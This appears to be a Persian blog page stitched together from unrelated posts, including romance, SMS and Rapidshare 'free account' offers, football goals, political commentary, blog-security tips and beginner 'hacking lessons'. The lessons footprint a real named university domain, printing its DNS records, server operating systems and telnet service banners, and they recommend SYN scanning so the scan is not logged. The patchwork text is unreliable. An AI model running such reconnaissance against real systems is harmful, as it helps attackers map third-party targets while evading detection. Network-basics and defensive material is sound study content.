چه زیبا این عاشق راز عشقش را با معشوقش در میان گذاشت
می خوام بگم یکی از راز های موفقت در عشق همین صداقت
هستش که آرزو می کنم همه عاشقان این سرزمین تنهایی ها
این نعمت را در وجودشون داشته باشن

رشد روزافزون كاربران اينترنت در جهان زندگى انسان ها را دگرگون كرده است و از اين ميان طيف وسيعى از كاربران اينترنت را در منازل كودكان و نوجوانان تشكيل مى دهند. اينترنت با جذابيت هاى منحصر به فرد خود بسيارى از نوجوانان و كودكان جامعه را به خود جلب كرده است.

دو عامل باعث مى شود كه نسل جديد تسلط بيشترى بر دنياى فناورى اطلاعات و ديجيتال داشته باشد اول اين كه در اين دوره يادگيرى كامپيوتر به مسئله اى ضرورى بدل شده و بدون داشتن تسلط كافى بر كامپيوتر و اينترنت كار و زندگى امكان پذير نيست.عامل دوم اين است كه كودكان و نوجوانان نسبت به افراد ميانسال از اشتياق و جرات بيشترى براى كنجكاوى در كامپيوتر و اينترنت برخوردارند و راحت تر با پندارها و باورهاى متعارف كنار مى آيند.اينترنت مزايا و امكانات بى شمارى را فراروى عموم به ويژه قشر نوجوان قرار مى دهد، اما از ديگر سو داراى تاثيرات منفى نيز است كه در صورت توجه نكردن به آن سلامت اين نسل و در نهايت سلامت جامعه را به خطر خواهد انداخت.

YouTube Downloader v2.4 Portable

قصد داریم تا هم اکنون یک ترفند ساده اما کاربردی در یاهو مسنجر را به شما معرفی کنیم. همان طور که میدانید در تمامی محیط های ویندوز وقتی میخواهید یک سطر پایین بیایید همواره از دکمه Enter استفاده میکنید. اما در یاهو مسنجر با زدن دکمه Enter متن نوشته شده توسط شما برای فردی که با او چت میکنید ارسال میشود. در نتیجه با زدن Enter نمیتوان یک سطر پایین آمد. حال با استفاده از این ترفند میتوانید در هر بار ارسال چندین خط نوشته و سطر به سطر پایین بیایید.

بدین منظور:
در داخل صفحه مربوط به ارسال PM یا داخل ChatRoom کافی است متن مورد نظر را نوشته و سپس دکمه Ctrl را نگاه داشته و Enter بزنید. خواهید دید که یک سطر مکان نما پایین آمده و میتوانید در خط پایین بنویسید.
این را هم بدانید که با این کار متن همان گونه که تایپ کرده اید برای فرد مورد نظر نمایش داده میشود.

ببخشيد اگه موضوع سايت در رابطه با ارسال ((اس ام اس  sms))رايگان از طريق اينترنت بود و تاحالا در اين مورد چيزي نگذاشته بودم.ولي حالا به قولم عمل ميکنم.خوبي اين سرويس اين است که به درد عزيزاني که خارج از کشور هم هستن ميخوره.اولين شرط براي ارسال (اس ام اس)اينه که بايد يک خط موبايل داشته باشيد.ولي نه از موبايل استفاده ميکنيد و نه هيچگونه هزينه اي يراي شما در بر خواهد داشت.
ببخشيد اگه موضوع سايت در رابطه با ارسال ((اس ام اس  sms))رايگان از طريق اينترنت بود و تاحالا در اين مورد چيزي نگذاشته بودم.ولي حالا به قولم عمل ميکنم.خوبي اين سرويس اينه که به درد عزيزاني که خارج از کشور هم هستن ميخوره.اولين شرط براي ارسال (اس ام اس)اينه که بايد يک خط موبايل داشته باشيد.اگه خط موبايل داريد يک ايميل به من ميزنيد که موضوع اون درخواست (اس ام اس ) باشه.بعدا من يک دعوت نامه واستون ارسال ميکنم که از شما اسم و فاميل و ايميل و شماره موبايل شما را ميپرسه.البته به صورت يک ليسته که راحت ميتونيد اونو پر کنيد.وقتي که کاملا اون ليستو پر کرديد با مشاهده يک پيغام تشکر از سايت خارج بشيد.وقتي که ليستو کامل پر کرديد يک کد به موبايل شما  sms  ميشه.حالا معلوم نيست اين کد کي  sms  بشه واستون.ولي حداکثر از يک روز بيشتر نميشه.(شايد کد نیم ساعته واستون ارسال بشه).وقتی کد را دریافت کردید به ایمیلتون سر بزنید.میبینید که یک  email  واستون امده.وقتی که وارد ایمیل شدید مشاهده میکنید که یک کادر کوچیکه که اون کدی که به موبایل شما ارسال شده را باید در درون آن وارد کنید.وقتی که این کار را انجام دادید وارد ادامه مرحله ثبت نام میشویم.بعد ا کامل کردن مرحله ثبت نام وارد ثایت میشوید و  id  (همون ایمیلتونه مثلا example@msn.com  و پسورد خود را وارد کنید.حالا شما میتوانید 15  sms  رایگان برای دوستان خود ارسال کنید.حالا روشی هست که میتوانید تعداد  sms  های خود را به هزاران هزار افزایش دهید.برای این کارباید وقتی وارد ثایت شدید در ستون سمت چپ یک گزینه به نام  riper a frind  وجود دارد.در ان قسمت باید دوستان خودتون که موبایل دارند رو وارد کرده.بعد دوست شما اگر مرحله ثبن نام را به صورت کامل(همانطوری که شما انجام دادید) انجام بدهد سایت به ازای این کار به شما 50  sms  رایگان دیگر هدیه می دهد.
1:خیالتون راحت باشه چون اون سایت مربوط به سازمان مخابرات است و هیچگونه سوئ استفاده ای نمیتوان از آن کرد
2:شما میتونید به شماره های خارج از کشور  sms  ارسال کنید.
3:خواهش میکنم نظـــــــــــــــــــــــــــــــــر یادتون نره.

zobahan-Esteghlal-محمد نوازی

گل های دیدار استقلال - سایپا

گل اول استقلال - استقلال اهواز ( امیر حسین صادقی)

گل دوم استقلال - استقلال اهواز ( آرش برهانی)

گل سوم استقلال - استقلال اهواز ( میثم منیعی)

استقلال تهران – پیكان - كاظمی

استقلال تهران – پیكان - قربانی

براي دريافت اكانت رايگان پرميوم رپيدشير ميتوانيد به لينك زير مراجعه كرده و ثبت نام كنيد و اكانت Premium Rapidshare را دريافت نماييد.

ثبت نام

از خاصیت های این اکانت پرمیوم ، آپلود بیشتر از 100 مگابایت   [A:9]   و دانلود آزاد می باشد (بدون زمان انتظار)  [A:4]

• حاکمیت جمهوری اسلامی هم با مقاومت در برابر خواست ملی ایرانیان برای توزیع دمکراتیک و مسالمت آمیز قدرت و آزادی و نیز نهادینه شدن حقوق بشر، بسترساز اصلی اعتراضات و تمایلات استقلال خواهانه و تجزیه طلبانه ی قومی است و هم به علت تلاش و کوشش همیشگی در به انحراف کشیدن هرگونه اعتراض مدنی به سمت تجزیه طلبی و استقلال خواهی، متهم و نیز میوه چین اصلی مسایل قومی در ایران است …

چندی پیش، به دنبال چاپ چند کاریکاتور در روزنامه های اروپایی، بخش هایی از جهان اسلام به واکنش برخواست. این واکنش ها از لحاظی غیرمترقبه و ناباورانه بود:

الف) در این مناقسه چهارچوب های حقوقی و سیاسی کشورهای مختلف در برابر یکدیگر قرار گرفتند(۱).
ب) در این مناقشه باورهای مختلف از مفاهیمی چون آزادی بیان و توهین در جاهای مختلف دنیا در برابر همدیگر صف آرایی کردند.
ج) برخی از دولت ها در دامن زدن به این اختلاف ها سنگ تمام گذاشتند و با تدارک امکانات لازم برای ابراز خشم و نفرت، هم به تحریض و تحریک مسلمانان همت گماشتند و هم با به میدان آوردن قلم های همسو برآن شدند که ادبیات لازم برای عبور غیر مسالمت آمیز از مناسبات حقوقی و گفتمانی مستقر در جهان را فراهم بیاورند.

د) دولت های غیر دمکراتیک تلاش کردند شهربندان(۲) خود را به تمسخر حقوق شهروندی بکشانند.
و این چنین بود که یک کج سلیقگی ژورنالیستی یا اظهار نظر ساده ی سیاسی- اعتقادی به یک بحرانی جهانی نگران کننده تبدیل شد، تا آن جا که در برخی از نقاط جهان، این گردباد انسان هایی را به کام خود کشید و قربانی کرد.
در این روزها کاریکاتوری دیگر، البته نه در سطح جهانی بلکه در سطح ملی حادثه آفرین و خبرساز شده است. چاپ یک کاریکاتور در روزنامه ی دولتی “ایران” به واکنش گسترده ی آذری زبان های ایرانی منجر شده است تا آن جا که به علت دخالت نیروهای پلیس چندین نفر کشته و صدها نفر بازداشت شده اند

MagiDemo

به طور كل نرم افزارMagic-PS به شش قسمت تقسيم ميشود كه آموزش را بر اساس اين قسمت بنديها شروع ميكنيم:

- 133t Speak چيست؟

گاهی هکرها در هنگام نوشتن به جای تعدادی از حروف انگليسی معادل‌های قراردادی به کار می‌روند که ليست آنها را در زير می‌بينيد:

0 <= O
1 <= L; I
2 <= Z
3 <= E
4 <= A
5 <= S
6 <= G
7 <= T
8 <= B
| <= L; I
@ <= at (duh)
$ <= S
)( <= H
}{ <= H
/\/ <= N
\/\/ <= W
/\/\ <= P; D
|< <= K
ph <= f
z 34|< z <= he speak

همانطور که میدانید و اطلاع دارید جدیدا هک شدن وبلاگها توسط هکر ها رایج شده است.

به طوری که هر هکر یا گروه هکری کار هک خود را با هک وبلاگ ها آغاز میکند.

وبلاگ نیز میتوان گفت یک سایت رایگان است ولی آیا امنیت این وبلاگها بر عهده کیست؟

میتوان به اطمینان گفت 99%امنیت وبلاگها در دست صاحبان وبلاگ است.

ولی هکر ها چگونه وبلاگهای ما رو هک میکنند؟

1- هک کردن ایمیل صاحب وبلاگ

به طوری که هکر ایمیل صاحب وبلاگ را هک کرده بعد برای ورود به وبلاگ به قسمت فراموش کردن پسورد وبلاگ میرود.

در این قسمت باید ایمیل صاحب وبلاگ زده شه تا پسورد وبلاگ به این ایمیل انتقال پیدا کند.پس هکر با در دست داشتن نام وبلاگ و داشتن پسورد ایمیل شما میتواند خیلی راحت به وبلاگتان دست رسی پیدا کند.

2- ایمیل جعلی

حیله دیگر هکر ها فرستادن ایمیل جعلی برای صاحبان وبلاگ است.به گونه ای که به طور دروغ خودشان را صاحب ارائه دهنده سرویس وبلاگشان معرفی میکنند و میخواهند از آنها که پسورد خود را برای آنها ایمیل کنید.

3-استفاده از صفحه های تقلبی

بعضی مواقع به شما آدرسهای نا آشنا پیشنهاد میشود.بعد از باز کردن این آدرس ها صفحه ای شبیه صفحه لاگین(صفحه ورودی به وبلاگ شما که یوزر نیم و پسورد را میخواهد)باز میشود.ولی آیا هر صفحه شبیه به آن صفحه لاگین ما باید مشخصاتمان را وارد نماییم.؟؟؟؟خیر.زیرا امکان دارد این مشخصات ما برای افراد غیر معتمد فرستاده شود.

4-استفاده از باگهای

گاهی اوقات سرویس دهنده های وبلاگ نمیتوانند آن طور که باید امنیتشان را تامین کنند برای همین با پیدا شدن چند باگ (حفره امنیتی) راه هک کردن را برای هکر ها را باز میکنند.

ولی این امر خیلی کم دیده میشود و میتوان گفت امکان چنین اتفاقی خیلی به ندرت دیده میشود.

ولی راههای جلوگیری از هک شدن وبلاگهایمان:

1-در مرحله اول سعی کنید وبلاگ خود را از یک سرویس دهنده مطمئن و مناسب انتخاب نمایید

2-در نگه داشتن ایمیل خود توجه داشته باشید.(مقالات قبلی به این مبحث اشاره شده است)

3-این را بدانید هرگز و تحت هیچ شرایطی صاحبان سرویس دهنده از شما پسورد وبلاگتان را نمیخواهند.

4-همیشه سعی کنید همه موارد صفحه لاگین(آدرس بار و...)را کاملا چک کرده بعد یوزر نیم و پسورد خودتان را وارد نمایید

5-سعی کنید از یک پسورد مناسب استفاده کنید(اشاره شده در مقالات قبلی)

6-سعی کنید همیشه در پر کردن لیست اسم نویسی برای وبلاگ ایمیل با آی دی که در مسنجر از آن استفاده مینمایید تفاوت داشته باشد.

استفاده و مد نظر گرفتن موارد بالا درصد هک شدن وبلاگ خود را تا حد زیادی کاهش داده اید.

هر روزه اخبار جديدي در مورد حملات و تهديدات کامپيوتري در رسانه هاي مختلف انتشار مي يابد. اين تهديدات شامل ويروس هاي جديد و يا انواع هک و نفوذ در سيستم هاي کامپيوتري است. انتشار اين گونه اخبار باعث شيوع اضطراب و نگراني در بين کاربراني مي شود که به صورت مستمر از کامپيوتر بهره مي گيرند و يا اطلاعاتي ارزشمند بر روي کامپيوترهاي خود دارند.
در اين مقاله سعي شده چند نکته که در رابطه با امنيت کامپيوتر اهميت اساسي دارند به صورت مختصر شرح داده شوند. يک کاربر در صورت رعايت اين نکات مي تواند تا حدود زيادي از حفظ امنيت سيستم کامپيوتري خود مطمئن باشد. در رابطه با بعضي از نکات که توضيحات بيشتري لازم بوده، مقالات جامع تري معرفي گرديده اند.

درس شماره 8
- خلاصه درس: ليست تکميلي پورت‌ها را بررسي مي‌کنيم. بحث telnet را ادامه مي‌دهيم و مطالبي را که آموختيم را جمع‌بندي مي‌کنيم.

 
◊ تکميل ليست پورت‌ها

در جلسه دوم در مورد مهمترين پورت‌ها صحبت کردم. حالا يک ليست کامل‌تر را در اين درس مي‌گم. اگر مي‌خواهيد يک مرجع نسبتا کامل براي مراجعه داشته باشيد، اينجا را کليک کنيد. دقت کنيد درس امروز و نيز لينک بالا هيچ بحثي در مورد تروجان‌ها نمي‌کند زيرا تروجان‌هاي شناخته شده هم يک سري پورت پيش‌فرض دارند که در جاي خود بحث خواهد شد.

Ports   TCP/UDP     Service or Application
------  -------     ----------------------------------------
 7        tcp        echo
 11       tcp        systat
 19       tcp        chargen
 21       tcp        ftp-data
 22       tcp        ssh
 23       tcp        telnet
 25       tcp        smtp
 42       tcp        nameserver
 43       tcp        whois
 49       udp        tacacs
 53       udp        dns-lookup
 53       tcp        dns-zone
 66       tcp        oracle-sqlnet
 69       udp        tftp
 79       tcp        finger
 80       tcp        http
 81       tcp        alternative for http
 88       tcp        kerberos or alternative for http
 109      tcp        pop2
 110      tcp        pop3
 111      tcp        sunrpc
 118      tcp        sqlserv
 119      tcp        nntp
 135      tcp        ntrpc-or-dec
 139      tcp        netbios
 143      tcp        imap
 161      udp        snmp
 162      udp        snmp-trap
 179      tcp        bgp
 256      tcp        snmp-checkpoint
 389      tcp        ldap
 396      tcp        netware-ip
 407      tcp        timbuktu
 443      tcp        https/ssl
 445      tcp        ms-smb-alternate
 445      udp        ms-smb-alternate
 500      udp        ipsec-internet-key-exchange (ike)
 513      tcp        rlogin
 513      udp        rwho
 514      tcp        rshell
 514      udp        syslog
 515      tcp        printer
 515      udp        printer
 520      udp        router
 524      tcp        netware-ncp
 799      tcp        remotely possible
 1080     tcp        socks
 1313     tcp        bmc-patrol-db
 1352     tcp        notes
 1433     tcp        ms-sql
 1494     tcp        citrix
 1498     tcp        sybase-sql-anywhere
 1524     tcp        ingres-lock
 1525     tcp        oracle-srv
 1527     tcp        oracle-tli
 1723     tcp        pptp
 1745     tcp        winsock-proxy
 2000     tcp        remotely-anywhere
 2001     tcp        cisco-mgmt
 2049     tcp        nfs
 2301     tcp        compaq-web
 2447     tcp        openview
 2998     tcp        realsecure
 3268     tcp        ms-active-dir-global-catalog
 3268     udp        ms-active-dir-global-catalog
 3300     tcp        bmc-patrol-agent
 3306     tcp        mysql
 3351     tcp        ssql
 3389     tcp        ms-termserv
 4001     tcp        cisco-mgmt
 4045     tcp        nfs-lockd
 5631     tcp        pcanywhere
 5800     tcp        vnc
 6000     tcp        xwindows
 6001     tcp        cisco-mgmt
 6549     tcp        apc
 6667     tcp        irc
 8000     tcp        web
 8001     tcp        web
 8002     tcp        web
 8080     tcp        web
 9001     tcp        cisco-xremote
 12345    tcp        netbus
 26000    tcp        quake
 31337    udp        backorifice
 32771    tcp        rpc-solaris
 32780    udp        snmp-solaris
 43188    tcp        reachout
 65301    tcp        pcanywhere-def

 
◊ ادامه بحث telnet

telnet هم جزو مواردي است که در footprinting مورد استفاده قرار مي‌گيرد. کاربرد آن در حالتيست که بخواهيم بدانيم که روي فلان پورت چه برنامه‌اي فال‌گوش‌ه و version آن چنده. به اين صورت که به يک پورت خاص (که مي‌دانيم روي آن سرور باز است) تلنت مي‌کنيم و بعد مي‌بينيم که نتايجي ظاهر مي‌شود که نشان‌دهنده اطلاعاتي‌ است که به‌کار مي‌رود. گاهي با مکثي طولاني مواجه مي‌شويم و هيچ چيزي نمايش داده نمي‌شود، در اين حالت يکي دوبار , Ctrl+Z , Ctrl+D , Ctrl+C , Ctrl+break را مي‌زنيم و خارج مي‌شويم. در مثال پايين جمع‌بندي مواردي که تا حالا از footprinting گفته‌ام را مي‌آورم.

 
◊ جمع‌بندي مطالب گفته شده و بررسي يک سايت

فرض کنيد مي‌خواهيم در مورد www.iums.ac.ir اطلاعاتي کسب کنيم :

◊ اول به سايت پينگ مي‌کنم و ip آن را به‌دست مي‌آورم: 194.225.184.15

◊ به کمک ip که به‌دست آورديم، به کمک يک پورت اسکنر پورت‌ها را بررسي مي‌کنيم و مي‌بينيم که پورت‌هايي مثل ۲۱، ۲۵، ۴۲، ۵۳، ۸۰، ۱۱۰، ۱۱۹، ۱۳۹، ۱۴۳ و ... باز است.

◊ چون domain به ir ختم مي‌شود، براي whois کردن از whois.nic.ir استفاده مي‌کنم و Name Server آن را به دست مي‌آورم که 194.225.184.20 است.

◊ به کمک اين Name Server ، يک nslookup مي‌کنم و به نتايج زير مي‌رسم:

 iums.ac.ir.                    SOA    sina.i........0 345600)
 iums.ac.ir.                    NS     sina.iums.ac.ir
 iums.ac.ir.                    NS     ns1.nic.ir
 iums.ac.ir.                    MX     10   sina.iums.ac.ir
 smtp.iums.ac.ir.               A      195.146.34.181
 sina.iums.ac.ir.       HINFO  Sun-SuperSPARC5/75  UNIX-Solaris-2.6
 sina.iums.ac.ir.               MX     10   sina.iums.ac.ir
 sina.iums.ac.ir.               A      194.225.184.20
 sina.iums.ac.ir.               A      195.146.34.181
 sun.iums.ac.ir.                CNAME  sina.iums.ac.ir
 cisco.iums.ac.ir.              CNAME  router.iums.ac.ir
 webmail.iums.ac.ir.            A      195.146.34.181
 linux.iums.ac.ir.              A      194.225.184.19
 linux.iums.ac.ir.      HINFO  Intel-Xeon/800  RedHat-Linux-7.2
 mta.iums.ac.ir.                A      195.146.34.181
 pop3.iums.ac.ir.               CNAME  sina.iums.ac.ir
 localhost.iums.ac.ir.          A      127.0.0.1
 proxy.iums.ac.ir.              CNAME  arvand.iums.ac.ir
 www.iums.ac.ir.                A      195.146.34.180
 atrak.iums.ac.ir.              A      194.225.184.14
 ns1.iums.ac.ir.                CNAME  sina.iums.ac.ir
 arvand.iums.ac.ir.             A      194.225.184.13
 router.iums.ac.ir.             A      194.225.184.1
 router.iums.ac.ir.     HINFO  Cisco3640/Access-Server  IOS-IP-12.0
 iums.ac.ir.                    SOA    sina.iu.......3456000 345600)

تک تک سطرهاي اين نتايج کاربرد دارد که خواهيم رسيد. الان فقط در مورد HIFNO صحبت مي‌کنم که براي مشخص تر بودن در بالا به صورت کمي فرورفته‌تر نوشتم. مثلا:

sina.iums.ac.ir.       HINFO  Sun-SuperSPARC5/75  UNIX-Solaris-2.6

HIFNO براي تعيين نوع کامپيوتر و سيستم‌عامل سرور اهميت دارد. در اين سطر مشخص است که sina.iums.ac.ir از Sun-SuperSPARC5/75 UNIX-Solaris-2.6 استفاده مي‌کند.

◊ چون پورت‌هاي باز را هم توسط پورت اسکنر به دست آورده‌ام به آنها تلنت مي‌کنم با دستور:
telnet www.iums.ac.ir portnum
نتايج حاصل از بعضي را مي‌بينيد:

25 :
... master.iums.ac.ir Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 ready at 220
پس پورت ۲۵ (smtp) در آن کامپيوتر از Microsoft ESMTP MAIL Service, Version: 5.0.2195.4905 استفاده مي‌کند.

110 :
.OK Microsoft Exchange 2000 POP3 server version 6.0.5762.3 (master.iums.ac.ir) ready+
پس پورت ۱۱۰ (pop3) در آن کامپيوتر از Microsoft Exchange 2000 POP3 server version 6.0.5762.3 استفاده مي‌کند.

119 :
NNTP Service 5.00.0984 Version: 5.0.2195.2966 Posting Allowed

و ...

جلسه ی هفتم آموزش هک
 
- خلاصه درس: بحث whois را ادامه می‌دهيم. با ping و tracert آشنا می‌شويم.
 
◊ ادامه بحث whois

قبلا در مورد ip whois و dns whois صحبت کردم. بحث dns whois (کسب اطلاعات در مورد يک domain خاص) رو ادامه می‌دم.
در درس قبلی از سايت SamSpade استفاده کردم. اگر اين whois رو تست کرده باشيد، می‌دانيد که برای يک سری از domain (دامنه) ها، جواب نمی‌دهد. مثال آن سايت‌هايی است که دارای دامنه جغرافيايی مثلا ايران هستند، در مورد دامنه‌های جغرافيايی ايران بايد گفت که به ir. ختم می‌شوند ( مثلا: neda.net.ir ). مثال ديگری که در whois سايت SamSpade کار نمی‌کند، تعدادی از دامنه‌های org , .net , .com. هستند که در internic.net ثبت نشده‌اند، بلکه در domainpeople.com ثبت شده‌اند ( مثلا sanjesh.org ). چند سال پيش ثبت domain هايی که در گروه org, net, com بودند، مختص به internic.net بود ولی الان ديگر اينطور نيست.

کاری که شما بايد برای whois کردن بايد انجام دهيد، توجه به نوع آن domain است که از نوع com است يا ir است يا biz است و ... بعد از آن از يکی از سايت‌های زير استفاده کنيد :

۱- internic.net :
برای edu , org , net , com عالی است. برای museum , int , info , coop , biz , arpa, aero هم‌ می‌تواند استفاده شود.
صفحه وب مربوطه عبارت‌ است از  http://www.internic.net/whois.html
يا می‌توانيد مستقيما در مرورگر بنويسيد:
http://www.internic.net/cgi/whois?type=domain&whois_nic=xxxxxxxx  که به‌جای xxxxxxxx مثلا بايد بنويسيد: far30.com

۲- nic.ir :
برای ir  استفاده می‌شود.
صفحه وب مربوطه عبارت‌ است از  /http://whois.nic.ir

۳- www.tv :
برای cc , info , biz , tv عالی است.
صفحه وب مربوطه عبارت‌ است از  /http://www.tv
يا می‌توانيد مستقيما در مرورگر بنويسيد:
http://www.tv/en-def-8e33e8cf5e3c/cgi-bin/whois.cgi?domain=yyyyyy&tld=zzzz  که اگر بخواهم مثلا hack.tv را whois کنم به‌جای yyyyy بايد بنويسيد hack و به جای zzzz بايد بنويسيد tv

۴- domainpeople.com :
برای name , biz , info , org , net , com عالی است.
صفحه وب مربوطه عبارت‌ است از  /http://whois.domainpeople.com

همانطور که ملاحظه می‌فرماييد، org , net , com در ۱ و ۴ مشترک است. علت آن است که بعضی‌ها در اولی و بعضی‌ها در چهارمی ثبت می‌شوند ولی برای whois کردن فرقی نمی‌کنه که شما از اولی استفاده کنيد يا چهارمی چون همديگر رو ساپورت می‌کنند.

 
◊ ping چيست ؟

ping دستوری است که مشخص می‌کند که آيا يک کامپيوتر خاص که ما ip يا domain آن را می‌دانيم، روشن و فعال (Active) هست يا نه. و اينکه اگر فعال باشد مدت زمان رسيدن بسته‌های tcp/ip از آن کامپيوتر به کامپيوتر ما چقدر است.
کاربرد اين دستور به صورت زير است:

ping ip-or-domain

که به جای ip-or-domain بايد شماره ip و يا domain آن(اگر داشته باشد) را می‌گذاريم.

مثلا ping prdev.com را در command prompt تايپ کردم و به نتايج زير رسيدم :

Pinging prdev.com [63.148.227.65] with 32 bytes of data:
 
Reply from 63.148.227.65: bytes=32 time=1402ms TTL=105
Reply from 63.148.227.65: bytes=32 time=941ms TTL=105
Reply from 63.148.227.65: bytes=32 time=981ms TTL=105
Reply from 63.148.227.65: bytes=32 time=851ms TTL=105
 
Ping statistics for 63.148.227.65:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 851ms, Maximum =  1402ms, Average =  1043ms

اين نتايج نشان می‌دهد که prdev.com فعال است.

حالا به کامپيوتری با ip شماره 63.148.227.65 (که همان prdev.com است)، ping می‌کنم. نتايج همان است فقط با تغييراتی در سطر اول. (البته time که معنای مدت زمان رسيدن پکت را می‌دهد، با توجه به ترافيک شبکه، کم و زياد خواهد شد). برای ping کردن به اين ip ، دستور 63.148.227.65 ping را صادر می‌کنم :

Pinging 63.148.227.65 with 32 bytes of data:
 
Reply from 63.148.227.65: bytes=32 time=861ms TTL=105
Reply from 63.148.227.65: bytes=32 time=852ms TTL=105
Reply from 63.148.227.65: bytes=32 time=851ms TTL=105
Reply from 63.148.227.65: bytes=32 time=881ms TTL=105
 
Ping statistics for 63.148.227.65:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 851ms, Maximum =  881ms, Average =  861ms

فرض کنيد که به يک ip که فعال نيست، ping کنيم:

Pinging 217.66.196.1 with 32 bytes of data:
 
Request timed out.
Request timed out.
Request timed out.
Request timed out.
 
Ping statistics for 217.66.196.1:
    Packets: Sent = 4, Received = 0, Lost = 4 (100% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum =  0ms, Average =  0ms

که نشان می‌دهد که آن ip در آن لحظه فعال نيست.

البته تمام مطالبی که در بالا ذکر شد، در حالتی است که مستقيما به اينترنت وصل شده‌ايد و يا اگر از طريق شبکه محلی به اينترنت وصل هستيد، شبکه شما به درستی پيکربندی شده باشد. اصولا ping يکی از بهترين دستورات برای پيدا کردن ايراد در شبکه است.

 
◊ tracert چيست ؟

tracert ( در يونيکس می‌شود traceroute ) ابزاری است که نشان می‌دهد که يک packet اطلاعاتی از کامپيوتر شما چه مسيری را طی می‌کند و از چه کامپيوترهايی می‌گذرد تا به يک مقصد خاص برسد. مقصد را ما مشخص می‌کنيم و معمولا همان کامپيوتری است که داريم footprinting می‌کنيم.

کاربرد اين دستور به صورت زير است:

tracert ip-or-domain

مثلا می‌خواهم ببينم که از چه کامپيوترهايی بايد رد شويم تا به prdev.com برسيم. برای اينکار می‌توان از يکی از دستورهای زير استفاده کرد:

tracert prdev.com
tracert 63.148.227.65

به نتيجه زير رسيدم:

Tracing route to prdev.com [63.148.227.65]
over a maximum of 30 hops:
 
  1   160 ms   160 ms   160 ms  217.218.84.3
  2   381 ms   691 ms  1772 ms  217.218.84.5
  3     *        *     2324 ms  217.218.77.1
  4   201 ms  1101 ms   180 ms  217.218.0.252
  5   341 ms   220 ms   180 ms  217.218.0.2
  6  1993 ms   180 ms   181 ms  217.218.158.41
  7   180 ms   160 ms   160 ms  195.146.63.101
  8  2824 ms     *        *     195.146.32.134
  9  1472 ms  1463 ms   871 ms  195.146.33.73
 10   791 ms   841 ms   811 ms  if-1....eglobe.net [207.45.218.161]
 11  1692 ms     *     2654 ms  if-4-....eglobe.net [207.45.222.77]
 12  1282 ms   891 ms  1052 ms  if-1-....globe.net [207.45.220.245]
 13   902 ms   931 ms   881 ms  if-15.....globe.net [66.110.8.134]
 14   931 ms   861 ms   871 ms  if-8-....leglobe.net [64.86.83.174]
 15   901 ms   841 ms   852 ms  if-5-.....globe.net [207.45.223.62]
 16   841 ms   862 ms   851 ms  pos6-.....vel3.net [209.0.227.33]
 17   841 ms   842 ms   941 ms  so-4-1.....vel3.net [209.247.10.205]
 18   882 ms   931 ms   851 ms  so-0-1....vel3.net [209.247.11.197]
 19   871 ms   891 ms   951 ms  gige9....vel3.net [209.247.11.210]
 20  1011 ms   851 ms   902 ms  unknown.Level3.net [63.208.0.94]
 21   852 ms     *      882 ms  64.156.25.74
 22   961 ms   942 ms   841 ms  63.148.227.65
 
Trace complete.

اين نتايج نشان می‌دهد که بايد از ۲۲ کامپيوتر بگذرم تا به prdev.com برسم. اين اطلاعات همان‌طور که بعدا خواهيد ديد، حاوی اطلاعات زيادی برای پيدا کردن فايروال‌ها و ... است. (بعضی سطرها رو کوتاه کردم و به‌جاش .... گذاشتم)

tracert دارای تعدادی switch است که دوتاش رو توضيح می‌دم:

d-   == >

با استفاده از اين سويچ در نتايج حاصله فقط ip ها نمايش داده می‌شود.
مثلا می‌نويسيم:
 
   tracert prdev.com -d
h max-hops-   ==>

حداکثر تعداد گام‌ها را تعيين می‌کند. حالت پيش‌فرض ۳۰  است.
مثلا می‌نويسيم:   tracert prdev.com -h 50

از اين دستور بعدا بسيار استفاده خواهيم کرد.

درس شماره 6

- خلاصه درس: انواع Scanning را مشخص می‌کنيم. بحث Port Scanning را آغاز می‌کنيم و از نرم‌افزار ipEye برای Port Scanning استفاده می‌کنيم.
 
◊ معمول‌ترين Scanning ها کدامند؟

دو نوع معمول Scanning وجود دارد:

۱- IP Scanning :
فرض کنيد که شما يک سری IP مربوط به يک ISP خاص را داريد و می‌خواهيد بدانيد که در اين لحظه کدام‌ها فعال (up) هستند تا فقط آنها را بررسی کنيد و نه‌ همه را. اين موضوع را بعدا توضيح می‌دم ( اين کار معمولا موقعی پيش می‌آيد که قرار است کلاينت هک کنيد و مهم نيست چه کسی باشد )

۲- Port Scanning :
در اين حالت ما IP يا IPهای مورد نظر را انتخاب کرده‌ايم و حالا می‌خواهيم بدانيم که کدام پورت‌ها روی آن کامپيوترها باز است. اين کار به کمک نرم‌افزارهای خاصی انجام می‌شود که مبحث امروز ماست.

 
◊ چگونه يک ارتباط TCP برقرار می‌شود که بگوييم فلان پورت باز است يا نه؟

برای اينکه تعيين کنيم که يک پورت روی يک سرور باز است يا نه، معمولا بايد يک TCP connect scan انجام دهيم. اول اين را بگم که Port Scanning انواع مختلف دارد که فعلا ما نوع TCP connect را مدنظر داريم. اين نوع اسکن سه مرحله دارد که به آن TCPs 3-way handshakeمی‌گويند:
۱- اول کامپيوتر ما به سمت سرور يک SYN packet می‌فرستد که به معنی درخواست اتصال است.
۲- اگر سرور اين درخواست را قبول کند، در مرحله دوم سرور به سمت ما يک SYN/ACK packet می‌فرستد.
۳- در مرحله آخر کامپيوتر ما يک ACK packet به سمت سرور می‌فرستد.

نوع ديگری از پورت اسکن TCP SYN scan نام دارد. با توجه به اينکه معمولا اگر پورت اسکن به روش بالا (TCP connect scan) انجام دهيم، معمولا در سرور اين اتصال ذخيره خواهد شد و بعدا می‌تواند ما را رديابی کنند، به جای آن می‌توان از TCP SYN scan استفاده کرد. در اين نوع اسکن، مراحل ۱ و ۲ از بالا انجام می‌شود ولی مرحله ۳ نه! اگر در مرحله ۲ به ما يک SYN/ACK برسد، آن پورت باز است و اگر يک RST/ACK برسد، يعنی بسته است.

انواع ديگری از پورت اسکنينگ هم وجود دارد مثل UDP scan, TCP Window scan, TCP ACK scan, TCP Null, TCP Xmas Tree, TCP FIN Scan

 
◊ چگونه می‌توان عمل Port scanning را انجام داد؟

